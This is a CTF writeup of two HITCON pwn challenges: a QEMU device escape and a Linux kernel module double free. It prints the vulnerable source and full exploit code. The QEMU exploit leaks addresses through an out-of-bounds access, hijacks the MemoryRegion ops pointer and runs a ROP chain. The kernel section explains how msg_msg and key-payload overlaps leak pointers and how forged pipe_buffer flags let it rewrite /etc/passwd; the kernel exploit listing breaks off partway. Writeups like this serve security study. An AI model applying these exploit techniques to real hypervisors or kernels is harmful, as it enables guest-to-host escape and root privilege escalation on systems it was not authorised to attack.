Last weekend I played the HITCON CTF qualifier as part of Maltese Prison Escapees. We placed 8th and thereby unfortunately missed the finals by one place :(.

scoreboard

As last year, the CTF once again offered a full-chain pwn challenge. This time the chain was chroot jailbreak -> kernel -> QEMU escape.

This post is a writeup of the QEMU escape (Wall Maria) and the kernel challenge (Wall Rose). I solved the kernel challenge. A teammate solved the QEMU challenge but I also developed my own exploit for it. The exploit codes and challenge files can be found in my repository.

Wall Maria

Wall Maria was a QEMU escape challenge. We are given the source code for the peripheral device “maria”:

#include "hw/hw.h"
#include "hw/pci/msi.h"
#include "hw/pci/pci.h"
#include "qapi/visitor.h"
#include "qemu/main-loop.h"
#include "qemu/module.h"
#include "qemu/osdep.h"
#include "qom/object.h"

#define TYPE_PCI_MARIA_DEVICE "maria"
#define MARIA_MMIO_SIZE 0x10000

#define BUFF_SIZE 0x2000

/* Per-instance state of the "maria" PCI device. */
typedef struct {
    /* embedded PCI device object */
    PCIDevice pdev;
    /* registers set through MMIO offsets 0x04 (src) and 0x08 (off) */
    struct {
		uint64_t src;
        uint8_t off;
	} state;
    /* BUFF_SIZE-byte data buffer; the MMIO handlers transfer from/to &buff[state.off] */
    char buff[BUFF_SIZE];
    /* MMIO region registered as BAR 0; declared directly after buff */
    MemoryRegion mmio;
} MariaState;

/* Declares the MARIA() helper used below to obtain a MariaState * from an object pointer. */
DECLARE_INSTANCE_CHECKER(MariaState, MARIA, TYPE_PCI_MARIA_DEVICE)

/*
 * MMIO read callback of the maria device.
 *
 * addr 0x00: calls cpu_physical_memory_rw() on guest address state.src and
 *            &buff[state.off] for BUFF_SIZE bytes with the last argument set
 *            to 1, then returns 0x600DC0DE.
 * addr 0x04: returns state.src.
 * addr 0x08: returns state.off.
 * otherwise: returns 0xDEADC0DE.
 *
 * `size` is not used.
 */
static uint64_t maria_mmio_read(void *opaque, hwaddr addr, unsigned size) {
    MariaState *maria = (MariaState *)opaque;
    uint64_t val = 0;
    switch (addr) {
        case 0x00:
            /*
             * NOTE: the length is always BUFF_SIZE although the transfer
             * starts at buff[state.off]; nothing checks that
             * state.off + BUFF_SIZE stays inside buff, so any non-zero off
             * makes the access run past the end of buff.
             */
            cpu_physical_memory_rw(maria->state.src, &maria->buff[maria->state.off], BUFF_SIZE, 1);
            val = 0x600DC0DE;
            break;
        case 0x04:
            val = maria->state.src;
            break;
        case 0x08:
            val = maria->state.off;
            break;
        default:
            val = 0xDEADC0DE;
            break;
    }
    return val;
}

/*
 * MMIO write callback of the maria device.
 *
 * addr 0x00: calls cpu_physical_memory_rw() on guest address state.src and
 *            &buff[state.off] for BUFF_SIZE bytes with the last argument set
 *            to 0; the written value is ignored.
 * addr 0x04: stores val in state.src.
 * addr 0x08: stores val in state.off (a uint8_t, so only the low byte is kept).
 * otherwise: ignored.
 *
 * `size` is not used.
 */
static void maria_mmio_write(void *opaque, hwaddr addr, uint64_t val, unsigned size) {
    MariaState *maria = (MariaState *)opaque;
    switch (addr) {
        case 0x00:
            /*
             * NOTE: same unchecked state.off + BUFF_SIZE span as in the read
             * callback; with a non-zero off the access extends beyond buff.
             */
            cpu_physical_memory_rw(maria->state.src, &maria->buff[maria->state.off], BUFF_SIZE, 0);
            break;
        case 0x04:
            maria->state.src = val;
            break;
        case 0x08:
            maria->state.off = val;
            break;
        default:
            break;
    }
}

/*
 * Callback table attached to the device's MMIO region in pci_maria_realize().
 * Both the accepted (.valid) and implemented (.impl) access sizes are fixed
 * at exactly 4 bytes.
 */
static const MemoryRegionOps maria_mmio_ops = {
    .read = maria_mmio_read,
    .write = maria_mmio_write,
    .endianness = DEVICE_NATIVE_ENDIAN,
    .valid = {
        .min_access_size = 4,
        .max_access_size = 4,
    },
    .impl = {
        .min_access_size = 4,
        .max_access_size = 4,
    },
};

/*
 * Realize callback (installed in maria_class_init). Initialises the
 * MARIA_MMIO_SIZE-byte "maria-mmio" region with maria_mmio_ops, passing the
 * MariaState itself as the opaque pointer handed to the callbacks, and
 * registers the region as memory BAR 0. `errp` is not used.
 */
static void pci_maria_realize(PCIDevice *pdev, Error **errp) {
    MariaState *maria = MARIA(pdev);
    memory_region_init_io(&maria->mmio, OBJECT(maria), &maria_mmio_ops, maria, "maria-mmio", MARIA_MMIO_SIZE);
    pci_register_bar(pdev, 0, PCI_BASE_ADDRESS_SPACE_MEMORY, &maria->mmio);
}

/* Instance initialiser: zeroes the src/off registers and the whole data buffer. */
static void maria_instance_init(Object *obj) {
    MariaState *maria = MARIA(obj);
    memset(&maria->state, 0, sizeof(maria->state));
    memset(maria->buff, 0, sizeof(maria->buff));
}

/*
 * Class initialiser: installs the realize callback, sets the PCI identity
 * (QEMU vendor id, device id 0xDEAD, revision 0, class "others") and marks
 * the device as belonging to the MISC category. `data` is not used.
 */
static void maria_class_init(ObjectClass *class, void *data) {
    DeviceClass *dc = DEVICE_CLASS(class);
    PCIDeviceClass *k = PCI_DEVICE_CLASS(class);

    k->realize = pci_maria_realize;
    k->vendor_id = PCI_VENDOR_ID_QEMU;
    k->device_id = 0xDEAD;
    k->revision = 0x0;
    k->class_id = PCI_CLASS_OTHERS;

    set_bit(DEVICE_CATEGORY_MISC, dc->categories);
}

/*
 * Describes the "maria" type (a TYPE_PCI_DEVICE subclass sized for
 * MariaState, implementing the conventional-PCI interface) and registers it.
 */
static void pci_maria_register_types(void) {
    /* interface list, terminated by an empty entry */
    static InterfaceInfo interfaces[] = {
        { INTERFACE_CONVENTIONAL_PCI_DEVICE },
        { },
    };
    static const TypeInfo maria_info = {
        .name = TYPE_PCI_MARIA_DEVICE,
        .parent = TYPE_PCI_DEVICE,
        .instance_size = sizeof(MariaState),
        .instance_init = maria_instance_init,
        .class_init = maria_class_init,
        .interfaces = interfaces,
    };

    type_register_static(&maria_info);
}

/* Hands pci_maria_register_types to QEMU's type_init() hook. */
type_init(pci_maria_register_types)

We can write to an internal buffer of the peripheral and read from it. To interact with the device from userspace we can use memory-mapped I/O (MMIO). The difficult part of this challenge is that the buffer is two pages big (0x2000 bytes) and we need to pass the physical address of our own buffer. Obtaining two physically contiguous pages for a userspace buffer of size 0x2000, however, is very unlikely / difficult.

To circumvent this, my teammate who solved the challenge had the great idea to allocate a buffer of only 0x1000 bytes and use that for exploitation. The author of this challenge used a different technique based on huge pages to actually obtain a buffer of size 0x2000 that is backed by two physically contiguous pages. You can read the writeup here.

Bug

The bug in this challenge is very obvious. We can specify an offset for reading and writing, but the code doesn’t account for it and still reads / writes 0x2000 bytes starting at that offset. This gives us an out-of-bounds read (oor) / out-of-bounds write (oow) primitive relative to MariaState.buff.

Exploitation

Based on the oor / oow primitive we can corrupt the MemoryRegion struct which is located directly after buff.

struct MemoryRegion {
    Object parent_obj;

    /* private: */

    /* The following fields should fit in a cache line */
    bool romd_mode;
    bool ram;
    bool subpage;
    bool readonly; /* For RAM regions */
    bool nonvolatile;
    bool rom_device;
    bool flush_coalesced_mmio;
    uint8_t dirty_log_mask;
    bool is_iommu;
    RAMBlock *ram_block;
    Object *owner;
    /* owner as TYPE_DEVICE. Used for re-entrancy checks in MR access hotpath */
    DeviceState *dev;

    const MemoryRegionOps *ops;
    void *opaque;

    ...
}

Looking at the first members of the struct we see that it contains an ops member, which is a pointer to a function table containing the MemoryRegion callbacks. The first function that is called when we access the MMIO region of the peripheral device is the accepts function. So by pointing ops at memory we control, and thereby replacing the accepts function pointer, we gain RIP control.

    /*
     * If present, and returns #false, the transaction is not accepted
     * by the device (and results in machine dependent behaviour such
     * as a machine check exception).
     */
    bool (*accepts)(void *opaque, hwaddr addr,
                    unsigned size, bool is_write,
                    MemTxAttrs attrs);

Looking at the function signature we can see that the first parameter is opaque. This is the pointer in the MemoryRegion struct that comes right after the ops pointer. So by also overwriting this pointer, we can also control rdi. Sadly we can’t simply call system("/bin/sh") as the qemu binary has a seccomp filter preventing this.

Therefore, I corrupted the accepts function pointer with a push rdi; pop rbp; ret gadget in order to stack pivot and execute a ropchain to read the flag.

Exploit

#include <assert.h>
#include <fcntl.h>
#include <stdio.h>
#include <stddef.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdbool.h>

#include <sys/mman.h>
#include <sys/types.h>

// NOTE(review): <stdbool.h> is included above and already supplies true/false
#define true 1
#define false 0

// Address of the mmio region in physical memory
#define MMIO_PHYSADDR 0xfebd0000
// NOTE(review): refers to `struct mmio` / `delete_req`, neither of which is
// defined in the visible source; the macro is never expanded here
#define MMIO_DELETE_PHYSADDR (MMIO_PHYSADDR + offsetof(struct mmio, delete_req))
// Length passed to mmap() for the device window
#define MMIO_SIZE 0x10000
// sysfs resource file that main() opens and mmap()s to reach the device registers
#define DEV_PATH "/sys/devices/pci0000:00/0000:00:05.0/resource0"
#define PAGE_SZ 0x1000

// not referenced elsewhere in the visible source
volatile int result;

// Register layout of the device window as seen through the mmap()ed resource.
// The member offsets (0x00, 0x04, 0x08) are the ones used by maria_read() and
// maria_write() to program a transfer.
typedef struct {
    uint32_t op;   // offset 0x00: accessed to trigger a transfer
    uint32_t src;  // offset 0x04: physical address used for the transfer
    uint32_t off;  // offset 0x08: offset into the device buffer
} mmio_t;

// NOTE(review): not referenced elsewhere in the visible source; presumably a
// leftover describing an allocator per-thread cache layout
struct tcache {
    uint16_t counts[64];
    uint64_t entries[64];
};

// Print msg together with the current errno description (perror) and
// terminate the process with exit(-1). Not called in the visible source.
static void die(const char* msg)
{
    perror(msg);
    exit(-1);
}

// WAIT(): block until a character arrives on stdin, then call fflush(stdin).
// Invoked as `WAIT();` with an empty argument; the macro parameter is unused.
#define WAIT(void) {getc(stdin); \
                    fflush(stdin);}
// errExit(msg): perror(msg) and terminate with EXIT_FAILURE.
#define errExit(msg) do { perror(msg); exit(EXIT_FAILURE); \
                        } while (0)

/*
 * Dump `len` bytes starting at `buf` to stdout as 64-bit hexadecimal words,
 * two words per line, followed by one extra newline.
 *
 * buf: memory to dump, read as an array of uint64_t.
 * len: number of bytes to dump; must be a multiple of 8 (asserted).
 */
static void hexdump8(uint64_t* buf, int len)
{
    assert(len % 0x8 == 0);

    const int words = len / 8;
    for (int i = 0; i < words; i++) {
        /* %llx expects unsigned long long; uint64_t need not be that type */
        printf("0x%016llx ", (unsigned long long)buf[i]);
        if (i % 2 == 1) {
            printf("\n");
        }
    }

    printf("\n");
}

// See https://www.kernel.org/doc/Documentation/vm/pagemap.txt
/*
 * Translate a virtual address of this process into a physical address by
 * reading the matching 64-bit entry from /proc/self/pagemap.
 *
 * p:                 virtual address to translate (need not be page aligned).
 * has_to_be_present: if non-zero, assert that the entry's "present" bit
 *                    (bit 63) is set.
 *
 * Returns the page frame number from the entry multiplied by the page size,
 * plus the offset of p inside its page. Exits via errExit() when the pagemap
 * file cannot be opened, positioned or read.
 */
static uint64_t virt2phys(void* p, int has_to_be_present)
{
    const uint64_t virt = (uint64_t)p;
    const uint64_t page_off = virt & 0xfff;
    const uint64_t vpn = virt / 0x1000;

    int fd = open("/proc/self/pagemap", O_RDONLY);
    if (fd == -1) {
        errExit("open");
    }

    // The file holds one 8-byte entry per virtual page
    if (lseek(fd, (off_t)(vpn * 8), SEEK_SET) == (off_t)-1) {
        errExit("lseek");
    }

    uint64_t entry;
    if (read(fd, &entry, sizeof(entry)) != (ssize_t)sizeof(entry)) {
        errExit("read");
    }

    // The descriptor is only needed for this single lookup
    close(fd);

    // Assert page present
    assert((!has_to_be_present) || (entry & (1ULL << 63)));

    // Bits 0-54 of the entry hold the page frame number
    const uint64_t pfn = entry & ((1ULL << 55) - 1);
    return pfn * 0x1000 + page_off;
}

// Value stored to the op register by maria_write() to start a transfer
#define TRIGGER 0x0

// read in our buffer
/*
 * Program the device's src and off registers, then read the op register,
 * which makes the device run a transfer for physical address `src`.
 *
 * mmio: mapped device register window.
 * src:  physical address handed to the device.
 * off:  offset into the device buffer.
 *
 * Returns the value read from the op register.
 */
static uint32_t maria_read(mmio_t* mmio, uint32_t src, uint8_t off)
{
    /* device registers: volatile forces real accesses in program order */
    volatile mmio_t *regs = mmio;

    regs->src = src;
    regs->off = off;
    return regs->op;
}

// write buffer to us
/*
 * Program the device's src and off registers, then store TRIGGER to the op
 * register, which makes the device run a transfer for physical address `src`.
 *
 * mmio: mapped device register window.
 * src:  physical address handed to the device.
 * off:  offset into the device buffer.
 *
 * Returns the value that was stored to the op register (TRIGGER); earlier
 * versions fell off the end of this non-void function.
 */
static uint32_t maria_write(mmio_t* mmio, uint32_t src, uint8_t off) {
    /* device registers: volatile forces real accesses in program order */
    volatile mmio_t *regs = mmio;

    regs->src = src;
    regs->off = off;
    regs->op = TRIGGER;
    return TRIGGER;
}

/*
 * Allocate a page-aligned work buffer and lock it into RAM.
 *
 * size: requested size in bytes; rounded up to a whole number of pages
 *       because aligned_alloc() expects a multiple of the alignment.
 *
 * Returns the buffer. Never returns NULL: the process exits via errExit()
 * when the allocation or mlock() fails.
 */
void *
alloc_workbuf(size_t size)
{
    const size_t alloc_sz = (size + PAGE_SZ - 1) & ~(size_t)(PAGE_SZ - 1);
    void* ptr = aligned_alloc(PAGE_SZ, alloc_sz);

    if (ptr == NULL) {
        errExit("aligned_alloc");
    }

    /* lock this buffer into RAM */
    if (mlock(ptr, alloc_sz) < 0) {
        errExit("mlock");
    }
    return ptr;
}

/*
 * Fake callback table that main() builds inside the work buffer and makes the
 * device's ops pointer refer to. Function pointers are held as plain 64-bit
 * integers. Only valid.accepts_fp is filled in by main(); the member order
 * and padding determine where that value lands, so the layout must not be
 * changed.
 * NOTE(review): presumably mirrors QEMU's MemoryRegionOps for the target
 * build - confirm against the QEMU version in use.
 */
typedef struct {
    uint64_t read_fp;
    uint64_t write_fp;
    uint64_t read_with_attrs_fp;
    uint64_t write_with_attrs_fp;
    int endianness;
    struct {
        unsigned min_access_size;
        unsigned max_access_size;
         bool unaligned;
        /* set to the stack-pivot gadget by main() */
        uint64_t accepts_fp;
    } valid;
    struct {
        unsigned min_access_size;
        unsigned max_access_size;
        bool unaligned;
    } impl;

} mem_reg_ops_t;

int main(void)
{
    int fd = open(DEV_PATH, O_RDWR | O_SYNC);
    int ret;

    if (fd < 0) {
        errExit("open dev");
    }

    mmio_t *mmio = mmap(NULL, MMIO_SIZE, PROT_READ | PROT_WRITE,
                                      MAP_SHARED, fd, 0);

    if (mmio == MAP_FAILED) {
        errExit("mmio mmap");
    }

    char *buf = alloc_workbuf(0x1000);

    uint64_t addr = virt2phys(buf, true);
    printf("phys addr: %p\n", addr);

    memset(buf, 0x0, 0x20);

    // -0x1000 to account for the fact that our buffer is only 0x1000 bytes big
    ret = maria_read(mmio, addr - 0x1000, 88);

    uint64_t* p_buf = (uint64_t*)(buf+ 0x1000-88);
    uint64_t qemu_leak = p_buf[0x48/ 8];
    // opaque = first param to mmio funcs
    uint64_t opaque = p_buf[0x50 / 8];
    uint64_t system_plt = qemu_leak - 0xc13ee0;
    uint64_t execv_plt = qemu_leak - 0xc14620;
    uint64_t qemu_base = qemu_leak -0xf1ff80;

    uint64_t pop_rdi_ret = qemu_base + 0x632c5d;
    uint64_t pop_rsi_ret = qemu_base + 0x4d4db3;
    uint64_t pop_rdx_ret = qemu_base + 0x47f5c8;

    uint64_t read_plt = qemu_base + 0x30d460;
    uint64_t open_plt = qemu_base + 0x30a270;
    uint64_t write_plt = qemu_base + 0x30dc70;
    uint64_t nop = qemu_base + 0x30601a;

    uint64_t xchg_rsi_rax = qemu_base + 0x9a6176;

    uint64_t push_rdi_pop_rbp = qemu_base + 0x8e7014;

    memcpy(buf, "/home/h0ps/flag", strlen("/home/h0ps/flag"));
    uint64_t str_loc = opaque + 0x1a88;

    // corrupt ops ptr, point it to our fake ops
    p_buf[0x48 / 8] = opaque + 0x1a88 + 0x20;
    // corrupt opaque member
    // -0x8 due to rbp pop
    p_buf[0x50 / 8] = opaque + 0x1a88 + 0x20 + sizeof(mem_reg_ops_t) - 0x8;

    p_buf = (uint64_t*)buf;
    uint64_t off = 0x20 / 8;

    mem_reg_ops_t *ops = (mem_reg_ops_t*)&p_buf[off];
    ops->valid.accepts_fp = push_rdi_pop_rbp;

    off += sizeof(mem_reg_ops_t) / sizeof(uint64_t);

    p_buf[off++] = pop_rdi_ret;
    p_buf[off++] = str_loc;
    p_buf[off++] = pop_rsi_ret;
    p_buf[off++] = 0x0;
    p_buf[off++] = pop_rdx_ret;
    p_buf[off++] = 0x0;
    p_buf[off++] = open_plt;

    p_buf[off++] = pop_rdi_ret;
    p_buf[off++] = 0xc;
    p_buf[off++] = pop_rsi_ret;
    p_buf[off++] = str_loc;
    p_buf[off++] = pop_rdx_ret;
    p_buf[off++] = 0x40;
    p_buf[off++] = read_plt;

    p_buf[off++] = pop_rdi_ret;
    p_buf[off++] = 0x1;
    p_buf[off++] = pop_rsi_ret;
    p_buf[off++] = str_loc;
    p_buf[off++] = pop_rdx_ret;
    p_buf[off++] = 0x40;
    p_buf[off++] = write_plt;

    p_buf[off++] = 0x424242;

    maria_write(mmio, addr - 0x1000, 88);

    printf("Fake stack: %p \n", opaque + 0x1a88+0x10);
    printf("qemu_leak: %p \n", qemu_leak);
    printf("system: %p \n", system_plt);
    printf("Opaqque: %p \n", opaque);
    printf("/bin/sh: %p \n", opaque+0x1a88);
    //hexdump8(p_buf, 0x80);

    //WAIT();
    // trigger chain
    ret = maria_read(mmio, 0x414141, 0x424242);
    return 0;
}

Wall Rose

Wall Rose was a kernel pwn challenge. We were given the source code of the vulnerable module which is very simple:

#include <linux/atomic.h>
#include <linux/device.h>
#include <linux/fs.h>
#include <linux/init.h>
#include <linux/kernel.h>
#include <linux/miscdevice.h>
#include <linux/module.h>
#include <linux/slab.h>
#include <linux/uaccess.h>
#include <asm/errno.h>
#include <linux/printk.h>

/* size in bytes of the buffer allocated on every open() */
#define MAX_DATA_HEIGHT 0x400

MODULE_AUTHOR("wxrdnx");
MODULE_LICENSE("GPL");
MODULE_DESCRIPTION("Wall Rose");

/*
 * Single module-wide buffer pointer: rose_open() overwrites it and
 * rose_release() frees whatever it currently points to. It is not tied to
 * an individual struct file.
 */
static char *data;

/*
 * open() handler: allocates a zeroed MAX_DATA_HEIGHT-byte buffer and stores
 * it in the global `data`, replacing any pointer stored by an earlier open.
 * Returns 0 on success and -1 when kmalloc() fails.
 */
static int rose_open(struct inode *inode, struct file *file) {
    data = kmalloc(MAX_DATA_HEIGHT, GFP_KERNEL);
    if (!data) {
        printk(KERN_ERR "Wall Rose: kmalloc error\n");
        return -1;
    }
    memset(data, 0, MAX_DATA_HEIGHT);
    return 0;
}

/*
 * release() handler: frees the buffer the global `data` currently points to.
 * NOTE: `data` is not cleared afterwards, so a later release frees the same
 * pointer again unless another open replaced it in between.
 */
static int rose_release(struct inode *inode, struct file *file) {
    kfree(data);
    return 0;
}

/* read() handler: logs a message and returns 0 without touching the user buffer. */
static ssize_t rose_read(struct file *filp, char __user *buffer, size_t length, loff_t *offset) {
    pr_info("Wall Rose: data dropped");
    return 0;
}

/* write() handler: logs a message and returns 0 without reading the user buffer. */
static ssize_t rose_write(struct file *filp, const char __user *buffer, size_t length, loff_t *offset) {
    pr_info("Wall Rose: data dropped");
    return 0;
}

/* File operations of the device: only open, release, read and write are provided. */
static struct file_operations rose_fops = {
    .owner = THIS_MODULE,
    .open = rose_open,
    .release = rose_release,
    .read = rose_read,
    .write = rose_write,
};

/* Misc device named "rose" with a dynamically assigned minor, backed by rose_fops. */
static struct miscdevice rose_device = {
    .minor = MISC_DYNAMIC_MINOR,
    .name = "rose",
    .fops = &rose_fops,
};

/* Module init: registers the misc device and returns misc_register()'s result. */
static int __init rose_init(void) {
    return misc_register(&rose_device);
}

/* Module exit: unregisters the misc device. */
static void __exit rose_exit(void) {
    misc_deregister(&rose_device);
}

/* Module entry and exit points. */
module_init(rose_init);
module_exit(rose_exit);

We can’t do anything other than opening and closing the device. Read and write both do nothing.

Bug

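The bug is very simple as well. The module keeps a single global data pointer that every open overwrites and every close frees without clearing it. By opening the device multiple times and then closing it multiple times, we can therefore free the most recently allocated chunk several times. Since the data chunk is 0x400 bytes big, this means we can free arbitrary objects in the kmalloc-1024 slab.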

Exploitation

A special thing about this challenge was that it had CONFIG_FG_KASLR (function granular KASLR) enabled. This configuration enables finer grained kernel address space randomization on a per-function level granularity. This means that obtaining a kernel base leak is not as easy as simply leaking e.g. an ops pointer and subtracting an offset. Furthermore, we can’t open /dev/ptmx which prevents us from leveraging tty_struct for exploitation.

Given these circumstances, using an exploitation technique which doesn’t require a kernel leak seemed like a good idea. One interesting structure for this is the pipe_buffer struct which gets allocated when using pipes. If we are able to corrupt such a struct we can emulate the dirty pipe vulnerability and corrupt /etc/passwd. For background information on dirty pipe, refer to this post.

So the basic plan is:

  1. Allocate a bunch of pipes
  2. Call splice on them with a fd for /etc/passwd to create a file-backed pipe_buffer
  3. Corrupt the flags member of the pipe_buffer to PIPE_BUF_FLAG_CAN_MERGE (0x10)
  4. Write root user without password to /etc/passwd
  5. Win

Looking at the pipe_buffer struct, we see that the flags member is at offset 24:

/* Kernel descriptor of one pipe buffer slot (quoted for reference). */
struct pipe_buffer {
	struct page *page;
	unsigned int offset, len;
	const struct pipe_buf_operations *ops;
	/* byte offset 24 with 8-byte pointers and 4-byte ints: 8 + 4 + 4 + 8 */
	unsigned int flags;
	unsigned long private;
};

So to corrupt the flags member while keeping the struct valid, we need to leak pointers first.

Leaking pointers of a file-backed pipe_buffer

To leak pointers we can free a user_key_payload struct using the bug of the module and corrupt it with a msg_msg struct. Both are elastic objects so we can make them go into the kmalloc-1024 slab.

/*
 * Kernel header of a System V message (quoted for reference).
 * m_type comes right after the list head; assuming struct list_head is two
 * pointers, that is byte offset 16 on a 64-bit kernel.
 */
struct msg_msg {
	struct list_head m_list;
	long m_type;
	size_t m_ts;		/* message text size */
	struct msg_msgseg *next;
	void *security;
	/* the actual message follows immediately */
};

/*
 * Kernel payload of a "user" key (quoted for reference).
 * datalen comes right after the RCU head; assuming struct rcu_head is two
 * pointers, that is byte offset 16 on a 64-bit kernel.
 */
struct user_key_payload {
	struct rcu_head	rcu;		/* RCU destructor */
	unsigned short	datalen;	/* length of this data */
	char		data[] __aligned(__alignof__(u64)); /* actual data */
};

If we free a user_key_payload struct and then corrupt it by allocating a msg_msg struct on top of it, the datalen field will be overwritten by the m_type field of the msg_msg struct. By choosing a big enough number for the type of our message, we can use this to achieve an out-of-bounds read (oor) when reading the key back.

Once we have an out of bounds read on the heap, we can use this to leak pipe_buffer pointers.

Corrupting file-backed pipe_buffer

Having obtained valid pointers for a file-backed pipe_buffer, we can then simply overwrite another file-backed pipe_buffer using either a msg_msg struct or a user_key_payload struct.

Exploit

#define _GNU_SOURCE
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/timerfd.h>
#include <sys/msg.h>
#include <fcntl.h>
#include <stdint.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <linux/keyctl.h>
#include <limits.h>
#include <stdarg.h>
#include <sys/xattr.h>
#include <stdlib.h>
#include <stdbool.h>
#include <sched.h>
#include <errno.h>
#include <sys/wait.h>
#include <sys/prctl.h>
#include <sys/resource.h>
#include <sys/msg.h>
#include <sys/timerfd.h>

#define DEV_PATH "/dev/rose"   // the path the device is placed

#define ulong unsigned long
#define PAGE_SZ 0x1000
#define FAULT_ADDR 0xdead0000
// PAGE is not defined anywhere in this file; PAGE_SZ is its page-size constant
#define FAULT_OFFSET PAGE_SZ
// Parenthesized so the macros expand safely inside larger expressions
#define MMAP_SIZE (4 * PAGE_SZ)
#define FAULT_SIZE (MMAP_SIZE - FAULT_OFFSET)
// Element count of a true array (not of a pointer)
#define ARRAY_SIZE(a) (sizeof((a)) / sizeof((a)[0]))
// Bit patterns tested by is_heap_ptr() / is_kernel_ptr()
#define HEAP_MASK 0xffff000000000000
#define KERNEL_MASK 0xffffffff00000000

// WAIT(): block until a character arrives on stdin, then call fflush(stdin).
// Invoked as `WAIT();` with an empty argument; the macro parameter is unused.
#define WAIT(void) {getc(stdin); \
                    fflush(stdin);}
// errExit(msg): perror(msg) and terminate with EXIT_FAILURE.
#define errExit(msg) do { perror(msg); exit(EXIT_FAILURE); \
                        } while (0)

// KMALLOC(qid, msgbuf, N): send msgbuf to queue qid N times, each time with
// a text length of sizeof(msgbuf.mtext) - 0x30; exits on the first failure.
// Not used in the visible source.
#define KMALLOC(qid, msgbuf, N) for(int ix=0; ix!=N; ++ix){\
                        if(msgsnd(qid, &msgbuf, sizeof(msgbuf.mtext) - 0x30, 0) == -1) \
                            errExit("KMALLOC"); \
                        }


// descriptor pairs filled by alloc_pipe_buf() via pipe()
int pipes[0x1000][0x02];
// message queue ids filled by alloc_qid()
int qids[0x1000];
// key serials stored by main() from alloc_key()
int keys[0x1000];
// not referenced elsewhere in the visible source
int seq_ops[0x10000];
// /dev/ptmx descriptors filled by alloc_tty()
int ptmx[0x1000];
// running counter main() uses to number key descriptions
int n_keys;

// Userspace stand-in for a message segment header; only its size is used
// (send_msg_payload() adds it to the header size for messages above PAGE_SZ).
typedef struct msg_msg_seg msg_msg_seg_t;
struct msg_msg_seg {
    msg_msg_seg_t* next;
};

// Two-pointer placeholder used as the first member of msg_msg_t and
// struct user_key_payload so their sizes can be computed in userspace.
struct rcu_head {
    void *next;
    void *func;
};

// Userspace copy of the message header, used for sizeof() arithmetic only.
// m_list is declared as a two-pointer rcu_head placeholder here. With 8-byte
// pointers and longs the struct is 0x30 bytes.
typedef struct msg_msg {
    struct rcu_head m_list;
    long m_type;
    size_t m_ts;      /* message text size */
    struct msg_msgseg *next;
    void *security;
    /* the actual message follows immediately */
} msg_msg_t;

// size = 40
// View that main() overlays on leaked heap data to pick out pipe buffer
// descriptors; pointers are kept as 64-bit integers and the explicit padding
// member keeps `private` at byte offset 32.
typedef struct
{
    uint64_t page;
    uint32_t offset;
    uint32_t len;
    uint64_t ops;
    uint32_t flags;
    uint32_t padding;
    uint64_t private;
}pipe_buf_t;

// Userspace copy of the key payload header; alloc_key() uses only its size.
// The trailing payload is a byte array aligned like a 64-bit value (it was
// previously declared as an array of char pointers); sizeof() is unchanged.
struct user_key_payload {
    struct rcu_head rcu;
    unsigned short datalen;
    char data[] __attribute__((aligned(8)));
};

// Holder for two leaked base addresses; not used in the visible source.
typedef struct {
    long kaslr_base;
    long physmap_base;
} leak_t;

// Key identifier type passed to and returned by the add_key()/keyctl() wrappers below.
typedef int32_t key_serial_t;

static void alloc_qid(int i) {
    qids[i] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
    if (qids[i] < 0) {
        errExit("[X] msgget");
    }
}

/*
 * Queue one message whose text is filled with byte `c`.
 *
 * qid:  destination queue.
 * c:    fill byte for the message text.
 * size: total size including the message header; the text length is
 *       size - sizeof(msg_msg_t).
 * type: message type; 0 selects the default type 0xffff.
 *
 * Sends with IPC_NOWAIT and terminates the process if msgsnd() fails.
 */
static void send_msg(int qid, int c, int size, long type)
{
    struct filled_msg
    {
        long mtype;
        char mtext[size - sizeof(msg_msg_t)];
    } out;
    const size_t text_len = sizeof(out.mtext);

    out.mtype = type ? type : 0xffff;
    memset(out.mtext, c, text_len);

    if (msgsnd(qid, &out, text_len, IPC_NOWAIT) < 0)
    {
        errExit("msgsnd");
    }
}

/*
 * Queue one message whose text is copied from `buf`.
 *
 * qid:  destination queue.
 * buf:  source of the message text; must hold at least the text length.
 * size: total size including headers. The text length is size minus
 *       sizeof(msg_msg_t), and additionally minus sizeof(msg_msg_seg_t)
 *       when size exceeds PAGE_SZ.
 * type: message type; 0 selects the default type 0xffff.
 *
 * Sends with IPC_NOWAIT and terminates the process if msgsnd() fails.
 */
static void send_msg_payload(int qid, char* buf, int size, long type)
{
    const int hdr_len = (size > PAGE_SZ)
        ? (int)(sizeof(msg_msg_t) + sizeof(msg_msg_seg_t))
        : (int)sizeof(msg_msg_t);

    struct payload_msg
    {
        long mtype;
        char mtext[size - hdr_len];
    } out;
    const size_t text_len = sizeof(out.mtext);

    out.mtype = type ? type : 0xffff;
    memcpy(out.mtext, buf, text_len);

    if (msgsnd(qid, &out, text_len, IPC_NOWAIT) < 0)
    {
        errExit("msgsnd");
    }
}

/*
 * Receive one message of type 0xffff from `qid` without blocking and copy
 * its text to `data`.
 *
 * qid:  source queue.
 * data: destination; must have room for sz - 0x30 bytes.
 * sz:   total size including the 0x30-byte message header.
 *
 * Terminates the process if msgrcv() fails. Only the bytes that were
 * actually received are copied; the failure check now happens before the
 * copy instead of after it.
 */
static void recv_msg(int qid, void* data, size_t sz)
{
    struct msg_buf
    {
        long mtype;
        char mtext[sz - 0x30];
    } msg;

    const ssize_t got = msgrcv(qid, &msg, sizeof(msg.mtext), 0xffff, IPC_NOWAIT);
    if (got < 0) {
        errExit("msgrcv");
    }

    memmove(data, msg.mtext, (size_t)got);
}

/*
 * Print `len` bytes at `buf` as indexed 64-bit values, two per line,
 * followed by one extra newline. Trailing bytes that do not fill a whole
 * 64-bit word are ignored.
 */
static void print_hex8(void* buf, size_t len)
{
    const uint64_t *words = (const uint64_t *)buf;
    const size_t count = len / 8;

    for (size_t i = 0; i < count; i++) {
        /* %p expects a pointer argument, so convert the value explicitly */
        printf("%zu: %p ", i, (void *)(uintptr_t)words[i]);
        if (i % 2 == 1) {
            printf("\n");
        }
    }

    printf("\n");
}

/*
 * Open /dev/ptmx and keep the descriptor in ptmx[i].
 * Terminates the process when the open fails.
 */
static void alloc_tty(int i) {
    const int fd = open("/dev/ptmx", O_RDWR | O_NOCTTY);

    ptmx[i] = fd;
    if (fd >= 0) {
        return;
    }
    errExit("[X] alloc_tty");
}

/*
 * Close the descriptor stored in ptmx[i].
 * Terminates the process when close() fails.
 */
static void free_tty(int i) {
